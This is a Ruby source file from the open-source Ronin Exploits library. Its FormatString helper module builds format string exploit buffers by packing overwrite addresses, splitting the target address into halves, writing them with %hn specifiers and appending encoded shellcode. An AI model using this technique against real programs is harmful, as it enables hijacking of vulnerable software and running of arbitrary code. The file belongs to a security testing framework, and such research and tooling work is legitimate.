#
# Ronin Exploits - A Ruby library for Ronin that provides exploitation and
# payload crafting functionality.
#
# Copyright (c) 2007-2009 Hal Brodigan (postmodern.mod3 at gmail.com)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
#

require 'ronin/exploits/targets/format_string'
require 'ronin/exploits/helpers/binary'
require 'ronin/payloads/shellcode'

module Ronin
  module Exploits
    module Helpers
      module FormatString
        def self.extended(obj)
          obj.instance_eval do
            extend Ronin::Exploits::Helpers::Binary
          end
        end

        #
        # @return [String]
        #   The format string of the exploit.
        #
        def format_string
          @format_string ||= ''
        end

        #
        # Adds a new target to the exploit.
        #
        # @param [Hash] attributes
        #   Additioanl attributes to create the target with.
        #
        # @yield [target]
        #   If a block is given, it will be passed the newly created target.
        #
        # @yieldparam [Targets::FormatString] target
        #   The newly created target.
        #
        def targeting(attributes={},&block)
          self.targets << Targets::FormatString.new(attributes,&block)
        end

        #
        # @return [Payloads::Shellcode]
        #   The model which will be searched for acceptable payloads.
        #
        # @since 0.3.0
        #
        def use_payload_class
          Payload::Shellcode
        end

        protected

        #
        # Builds a format string using the current target and payload to
        # be used in the format string exploit.
        #
        # @return [String]
        #   The built format string.
        #
        def build_format_string
          verify_target!

          buffer = pack(target.overwrite) + 
                   pack(target.overwrite + (target.arch.address_length / 2))

          low_mask = 0xff
          (target.arch.address_length/2).times do
            low_mask <<= 8
            low_mask |= 0xff
          end

          high_mask = low_mask << (target.arch.address_length*4)
          high = (target.address & high_mask) >> (target.arch.address_length/2)
          low = target.address & low_mask

          if low < high
            low -= (target.arch.address_length*2)
            buffer += format("%%.%ud%%%u$hn%%.%ud%%%u$hn",low,target.pop_length,high-low,target.pop_length+1)
          else
            high -= (target.arch.address_length*2)
            buffer += format("%%.%ud%%%u$hn%%.%ud%%%u$hn",high,target.pop_length+1,low-high,target.pop_length)
          end

          buffer << encoded_payload
          return buffer
        end

        #
        # The default builder method which simply calls build_format_string
        # and sets the +@format_string+ instance variable.
        #
        def build
          @format_string = build_format_string
        end
      end
    end
  end
end